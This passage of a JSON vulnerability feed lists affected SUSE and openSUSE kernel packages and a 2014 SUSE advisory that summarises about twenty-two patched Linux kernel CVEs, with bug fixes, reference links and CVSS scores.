"OSVersion": "11.1", "packageVersion": "4.0.3_21548_16_2.6.32.59_0.15-0.5.26", "arch": "x86_64", "packageFilename": "xen-kmp-default-4.0.3_21548_16_2.6.32.59_0.15-0.5.26.x86_64.rpm", "packageName": "xen-kmp-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-trace-devel-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-trace-devel-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-default-extra-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-default-base-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-syms-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-default-devel-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-syms-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-default-extra-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-pae-extra-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-pae-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-xen-base-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-xen-extra-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-xen-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-pae-base-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-pae-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-source-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-default-base-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-trace-base-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-xen-base-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "4.0.3_21548_16_2.6.32.59_0.15-0.5.26", "arch": "x86_64", "packageFilename": "xen-kmp-trace-4.0.3_21548_16_2.6.32.59_0.15-0.5.26.x86_64.rpm", "packageName": "xen-kmp-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-xen-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-ec2-devel-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-pae-devel-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-pae-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-pae-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-pae", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-trace-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-trace", "operator": "lt"}], "description": "The SUSE Linux Enterprise Server 11 SP1 LTSS received a roll up update to\n fix several security and non-security issues.\n\n The following security issues have been fixed:\n\n * CVE-2013-1860: Heap-based buffer overflow in the wdm_in_callback\n function in drivers/usb/class/cdc-wdm.c in the Linux kernel before\n 3.8.4 allows physically proximate attackers to cause a denial of\n service (system crash) or possibly execute arbitrary code via a\n crafted cdc-wdm USB device. (bnc#806431)\n * CVE-2013-4162: The udp_v6_push_pending_frames function in\n net/ipv6/udp.c in the IPv6 implementation in the Linux kernel\n through 3.10.3 makes an incorrect function call for pending data,\n which allows local users to cause a denial of service (BUG and\n system crash) via a crafted application that uses the UDP_CORK\n option in a setsockopt system call. (bnc#831058)\n * CVE-2014-0203: The __do_follow_link function in fs/namei.c in the\n Linux kernel before 2.6.33 does not properly handle the last\n pathname component during use of certain filesystems, which allows\n local users to cause a denial of service (incorrect free operations\n and system crash) via an open system call. (bnc#883526)\n * CVE-2014-3144: The (1) BPF_S_ANC_NLATTR and (2)\n BPF_S_ANC_NLATTR_NEST extension implementations in the sk_run_filter\n function in net/core/filter.c in the Linux kernel through 3.14.3 do\n not check whether a certain length value is sufficiently large,\n which allows local users to cause a denial of service (integer\n underflow and system crash) via crafted BPF instructions. NOTE: the\n affected code was moved to the __skb_get_nlattr and\n __skb_get_nlattr_nest functions before the vulnerability was\n announced. (bnc#877257)\n * CVE-2014-3145: The BPF_S_ANC_NLATTR_NEST extension implementation in\n the sk_run_filter function in net/core/filter.c in the Linux kernel\n through 3.14.3 uses the reverse order in a certain subtraction,\n which allows local users to cause a denial of service (over-read and\n system crash) via crafted BPF instructions. NOTE: the affected code\n was moved to the __skb_get_nlattr_nest function before the\n vulnerability was announced. (bnc#877257)\n * CVE-2014-3917: kernel/auditsc.c in the Linux kernel through 3.14.5,\n when CONFIG_AUDITSYSCALL is enabled with certain syscall rules,\n allows local users to obtain potentially sensitive single-bit values\n from kernel memory or cause a denial of service (OOPS) via a large\n value of a syscall number. (bnc#880484)\n * CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel\n through 3.15.1 on 32-bit x86 platforms, when syscall auditing is\n enabled and the sep CPU feature flag is set, allows local users to\n cause a denial\n of service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000. (bnc#883724)\n * CVE-2014-4652: Race condition in the tlv handler functionality in\n the snd_ctl_elem_user_tlv function in sound/core/control.c in the\n ALSA control implementation in the Linux kernel before 3.15.2 allows\n local users to obtain sensitive information from kernel memory by\n leveraging /dev/snd/controlCX access. (bnc#883795)\n * CVE-2014-4653: sound/core/control.c in the ALSA control\n implementation in the Linux kernel before 3.15.2 does not ensure\n possession of a read/write lock, which allows local users to cause a\n denial of service (use-after-free) and obtain sensitive information\n from kernel memory by leveraging /dev/snd/controlCX access.\n (bnc#883795)\n * CVE-2014-4654: The snd_ctl_elem_add function in sound/core/control.c\n in the ALSA control implementation in the Linux kernel before 3.15.2\n does not check authorization for SNDRV_CTL_IOCTL_ELEM_REPLACE\n commands, which allows local users to remove kernel controls and\n cause a denial of service (use-after-free and system crash) by\n leveraging /dev/snd/controlCX access for an ioctl call. (bnc#883795)\n * CVE-2014-4655: The snd_ctl_elem_add function in sound/core/control.c\n in the ALSA control implementation in the Linux kernel before 3.15.2\n does not properly maintain the user_ctl_count value, which allows\n local users to cause a denial of service (integer overflow and limit\n bypass) by leveraging /dev/snd/controlCX access for a large number\n of SNDRV_CTL_IOCTL_ELEM_REPLACE ioctl calls. (bnc#883795)\n * CVE-2014-4656: Multiple integer overflows in sound/core/control.c in\n the ALSA control implementation in the Linux kernel before 3.15.2\n allow local users to cause a denial of service by leveraging\n /dev/snd/controlCX access, related to (1) index values in the\n snd_ctl_add function and (2) numid values in the\n snd_ctl_remove_numid_conflict function. (bnc#883795)\n * CVE-2014-4667: The sctp_association_free function in\n net/sctp/associola.c in the Linux kernel before 3.15.2 does not\n properly manage a certain backlog value, which allows remote\n attackers to cause a denial of service (socket outage) via a crafted\n SCTP packet. (bnc#885422)\n * CVE-2014-4699: The Linux kernel before 3.15.4 on Intel processors\n does not properly restrict use of a non-canonical value for the\n saved RIP address in the case of a system call that does not use\n IRET, which allows local users to leverage a race condition and gain\n privileges, or cause a denial of service (double fault), via a\n crafted application that makes ptrace and fork system calls.\n (bnc#885725)\n * CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\n Linux kernel through 3.15.6 allows local users to gain privileges by\n leveraging data-structure differences between an l2tp socket and an\n inet socket. (bnc#887082)\n * CVE-2014-5077: The sctp_assoc_update function in\n net/sctp/associola.c in the Linux kernel through 3.15.8, when SCTP\n authentication is enabled, allows remote attackers to cause a denial\n of service (NULL pointer dereference and OOPS) by starting to\n establish an association between two endpoints immediately after an\n exchange of INIT and INIT ACK chunks to establish an earlier\n association between these endpoints in the opposite direction.\n (bnc#889173)\n * CVE-2013-7266: The mISDN_sock_recvmsg function in\n drivers/isdn/mISDN/socket.c in the Linux kernel before 3.12.4 does\n not ensure that a certain length value is consistent with the size\n of an associated data structure, which allows local users to obtain\n sensitive information from kernel memory via a (1) recvfrom, (2)\n recvmmsg, or (3) recvmsg system call. (bnc#854722)\n * CVE-2013-7267: The atalk_recvmsg function in net/appletalk/ddp.c in\n the Linux kernel before 3.12.4 updates a certain length value\n without ensuring that an associated data structure has been\n initialized, which allows local users to obtain sensitive\n information from kernel memory via a (1) recvfrom, (2) recvmmsg, or\n (3) recvmsg system call. (bnc#854722)\n * CVE-2013-7268: The ipx_recvmsg function in net/ipx/af_ipx.c in the\n Linux kernel before 3.12.4 updates a certain length value without\n ensuring that an associated data structure has been initialized,\n which allows local users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.\n (bnc#854722)\n * CVE-2013-7269: The nr_recvmsg function in net/netrom/af_netrom.c in\n the Linux kernel before 3.12.4 updates a certain length value\n without ensuring that an associated data structure has been\n initialized, which allows local users to obtain sensitive\n information from kernel memory via a (1) recvfrom, (2) recvmmsg, or\n (3) recvmsg system call. (bnc#854722)\n * CVE-2013-7270: The packet_recvmsg function in net/packet/af_packet.c\n in the Linux kernel before 3.12.4 updates a certain length value\n before ensuring that an associated data structure has been\n initialized, which allows local users to obtain sensitive\n information from kernel memory via a (1) recvfrom, (2) recvmmsg, or\n (3) recvmsg system call. (bnc#854722)\n * CVE-2013-7271: The x25_recvmsg function in net/x25/af_x25.c in the\n Linux kernel before 3.12.4 updates a certain length value without\n ensuring that an associated data structure has been initialized,\n which allows local users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.\n (bnc#854722)\n\n The following bugs have been fixed:\n\n * mac80211: Fix AP powersave TX vs. wakeup race (bnc#871797).\n * tcp: Allow to disable cwnd moderation in TCP_CA_Loss state\n (bnc#879921).\n * tcp: Adapt selected parts of RFC 5682 and PRR logic (bnc#879921).\n * flock: Fix allocation and BKL (bnc#882809).\n * sunrpc: Close a rare race in xs_tcp_setup_socket (bnc#794824,\n bnc#884530).\n * isofs: Fix unbounded recursion when processing relocated directories\n (bnc#892490).\n * bonding: Fix a race condition on cleanup in\n bond_send_unsolicited_na() (bnc#856756).\n * block: Fix race between request completion and timeout handling\n (bnc#881051).\n * Fix kABI breakage due to addition of user_ctl_lock (bnc#883795).\n\n Security Issues:\n\n * CVE-2013-1860\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1860\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1860</a>>\n * CVE-2013-4162\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4162\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4162</a>>\n * CVE-2013-7266\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7266\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7266</a>>\n * CVE-2013-7267\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7267\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7267</a>>\n * CVE-2013-7268\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7268\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7268</a>>\n * CVE-2013-7269\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7269\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7269</a>>\n * CVE-2013-7270\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7270\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7270</a>>\n * CVE-2013-7271\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7271\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7271</a>>\n * CVE-2014-0203\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0203\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0203</a>>\n * CVE-2014-3144\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3144\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3144</a>>\n * CVE-2014-3145\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3145\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3145</a>>\n * CVE-2014-3917\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3917\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3917</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4652\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4652\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4652</a>>\n * CVE-2014-4653\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4653\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4653</a>>\n * CVE-2014-4654\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4654\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4654</a>>\n * CVE-2014-4655\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4655\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4655</a>>\n * CVE-2014-4656\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4656\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4656</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4699\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4699\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4699</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n", "edition": 1, "reporter": "Suse", "published": "2014-09-16T19:04:20", "title": "Security update for the Linux Kernel (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2013-7270", "CVE-2014-4699", "CVE-2014-4655", "CVE-2013-1860", "CVE-2014-4508", "CVE-2014-4943", "CVE-2013-7267", "CVE-2013-4162", "CVE-2014-4653", "CVE-2013-7266", "CVE-2014-3145", "CVE-2014-3917", "CVE-2014-4654", "CVE-2014-3144", "CVE-2014-4656", "CVE-2013-7269", "CVE-2014-4652", "CVE-2013-7271", "CVE-2013-7268", "CVE-2014-4667", "CVE-2014-0203"], "modified": "2014-09-16T19:04:20", "id": "SUSE-SU-2014:1138-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00023.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:38:24", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=896391", "https://bugzilla.suse.com/show_bug.cgi?id=856659", "https://bugzilla.suse.com/show_bug.cgi?id=887046", "https://bugzilla.suse.com/show_bug.cgi?id=904700", "https://bugzilla.suse.com/show_bug.cgi?id=891689", "https://bugzilla.suse.com/show_bug.cgi?id=908163", "https://bugzilla.suse.com/show_bug.cgi?id=883948", "https://bugzilla.suse.com/show_bug.cgi?id=896689", "https://bugzilla.suse.com/show_bug.cgi?id=853040", "https://bugzilla.suse.com/show_bug.cgi?id=882804", "https://bugzilla.suse.com/show_bug.cgi?id=864375", "https://bugzilla.suse.com/show_bug.cgi?id=818966", "https://bugzilla.suse.com/show_bug.cgi?id=905100", "https://bugzilla.suse.com/show_bug.cgi?id=875051", "https://bugzilla.suse.com/show_bug.cgi?id=873790", "https://bugzilla.suse.com/show_bug.cgi?id=902349", "https://bugzilla.suse.com/show_bug.cgi?id=887082", "https://bugzilla.suse.com/show_bug.cgi?id=897736", "https://bugzilla.suse.com/show_bug.cgi?id=896390", "https://bugzilla.suse.com/show_bug.cgi?id=889173", "https://bugzilla.suse.com/show_bug.cgi?id=902346", "https://bugzilla.suse.com/show_bug.cgi?id=905744", "https://bugzilla.suse.com/show_bug.cgi?id=902351", "https://bugzilla.suse.com/show_bug.cgi?id=904013", "https://bugzilla.suse.com/show_bug.cgi?id=896392", "https://bugzilla.suse.com/show_bug.cgi?id=883949", "https://bugzilla.suse.com/show_bug.cgi?id=892490", "https://bugzilla.suse.com/show_bug.cgi?id=899785", "https://bugzilla.suse.com/show_bug.cgi?id=893429", "https://bugzilla.suse.com/show_bug.cgi?id=890114", "https://bugzilla.suse.com/show_bug.cgi?id=896385", "https://bugzilla.suse.com/show_bug.cgi?id=909077", "https://bugzilla.suse.com/show_bug.cgi?id=910251", "https://bugzilla.suse.com/show_bug.cgi?id=884324", "https://bugzilla.suse.com/show_bug.cgi?id=883724", "https://bugzilla.suse.com/show_bug.cgi?id=881008", "https://bugzilla.suse.com/show_bug.cgi?id=907818", "https://bugzilla.suse.com/show_bug.cgi?id=865882", "https://bugzilla.suse.com/show_bug.cgi?id=883518", "https://bugzilla.suse.com/show_bug.cgi?id=835839", "https://bugzilla.suse.com/show_bug.cgi?id=900392", "https://bugzilla.suse.com/show_bug.cgi?id=896382", "https://bugzilla.suse.com/show_bug.cgi?id=882639"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "i586", "packageFilename": "hdjmod-kmp-desktop-debuginfo-1.28_k3.11.10_25-16.16.1.i586.rpm", "packageName": "hdjmod-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "x86_64", "packageFilename": "ipset-kmp-xen-6.21.1_k3.11.10_25-2.20.1.x86_64.rpm", "packageName": "ipset-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3-13.16.1", "arch": "x86_64", "packageFilename": "iscsitarget-debugsource-1.4.20.3-13.16.1.x86_64.rpm", "packageName": "iscsitarget-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3_k3.11.10_25-13.16.1", "arch": "x86_64", "packageFilename": "iscsitarget-kmp-xen-debuginfo-1.4.20.3_k3.11.10_25-13.16.1.x86_64.rpm", "packageName": "iscsitarget-kmp-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-xen-debugsource-3.11.10-25.1.i686.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "i586", "packageFilename": "hdjmod-kmp-pae-debuginfo-1.28_k3.11.10_25-16.16.1.i586.rpm", "packageName": "hdjmod-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i586", "packageFilename": "kernel-default-3.11.10-25.1.i586.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "xtables-addons-kmp-xen-2.3_k3.11.10_25-2.16.1.i586.rpm", "packageName": "xtables-addons-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "i586", "packageFilename": "virtualbox-guest-tools-debuginfo-4.2.18-2.21.1.i586.rpm", "packageName": "virtualbox-guest-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "x86_64", "packageFilename": "hdjmod-kmp-xen-1.28_k3.11.10_25-16.16.1.x86_64.rpm", "packageName": "hdjmod-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "x86_64", "packageFilename": "pcfclock-kmp-default-debuginfo-0.44_k3.11.10_25-258.16.1.x86_64.rpm", "packageName": "pcfclock-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1-2.20.1", "arch": "x86_64", "packageFilename": "libipset3-debuginfo-6.21.1-2.20.1.x86_64.rpm", "packageName": "libipset3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-desktop-base-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-desktop-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1-2.20.1", "arch": "x86_64", "packageFilename": "ipset-6.21.1-2.20.1.x86_64.rpm", "packageName": "ipset", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-guest-kmp-desktop-debuginfo-4.2.18_k3.11.10_25-2.21.1.x86_64.rpm", "packageName": "virtualbox-guest-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58_k3.11.10_25-16.1", "arch": "i586", "packageFilename": "ndiswrapper-kmp-default-debuginfo-1.58_k3.11.10_25-16.1.i586.rpm", "packageName": "ndiswrapper-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3_k3.11.10_25-13.16.1", "arch": "i586", "packageFilename": "iscsitarget-kmp-pae-1.4.20.3_k3.11.10_25-13.16.1.i586.rpm", "packageName": "iscsitarget-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-xen-debugsource-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "i586", "packageFilename": "xen-libs-4.3.2_02-30.1.i586.rpm", "packageName": "xen-libs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-guest-kmp-default-4.2.18_k3.11.10_25-2.21.1.x86_64.rpm", "packageName": "virtualbox-guest-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44-258.16.1", "arch": "i586", "packageFilename": "pcfclock-debugsource-0.44-258.16.1.i586.rpm", "packageName": "pcfclock-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3_k3.11.10_25-13.16.1", "arch": "x86_64", "packageFilename": "iscsitarget-kmp-desktop-debuginfo-1.4.20.3_k3.11.10_25-13.16.1.x86_64.rpm", "packageName": "iscsitarget-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "i586", "packageFilename": "xen-tools-domU-debuginfo-4.3.2_02-30.1.i586.rpm", "packageName": "xen-tools-domU-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "x86_64", "packageFilename": "crash-7.0.2-2.16.1.x86_64.rpm", "packageName": "crash", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-host-kmp-desktop-debuginfo-4.2.18_k3.11.10_25-2.21.1.x86_64.rpm", "packageName": "virtualbox-host-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-debug-devel-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-debug-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "x86_64", "packageFilename": "vhba-kmp-default-debuginfo-20130607_k3.11.10_25-2.17.1.x86_64.rpm", "packageName": "vhba-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-ec2-devel-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-ec2-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3_k3.11.10_25-13.16.1", "arch": "i586", "packageFilename": "iscsitarget-kmp-desktop-1.4.20.3_k3.11.10_25-13.16.1.i586.rpm", "packageName": "iscsitarget-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": 